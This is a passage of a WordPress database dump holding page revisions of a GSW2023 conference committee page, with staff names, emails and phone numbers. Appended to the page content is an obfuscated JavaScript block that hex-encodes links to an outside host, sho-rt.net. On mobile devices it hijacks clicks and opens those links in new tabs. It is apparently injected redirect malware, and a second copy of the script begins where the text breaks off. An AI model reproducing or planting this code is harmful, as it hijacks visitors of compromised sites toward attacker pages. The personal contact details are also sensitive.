src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Security Engineer</span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span>\r\nDirector of Events and conferences Department\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span>\r\nLocal financial Director, GSW2023, Egypt\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-08-13 20:08:51','2023-08-13 20:08:51','',4849,'https://gsw2023.com/?p=5161',0,'revision','',0),
(5162,1,'2023-08-13 20:10:01','2023-08-13 20:10:01','[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"alignnone wp-image-5160\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/zaki-212x300.jpg\" alt=\"\" width=\"108\" height=\"153\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"alignnone wp-image-5159\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa-267x300.jpg\" alt=\"\" width=\"129\" height=\"145\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Web Director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span>\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span>\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Security Engineer</span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span>\r\nDirector of Events and conferences Department\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span>\r\nLocal financial Director, GSW2023, Egypt\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 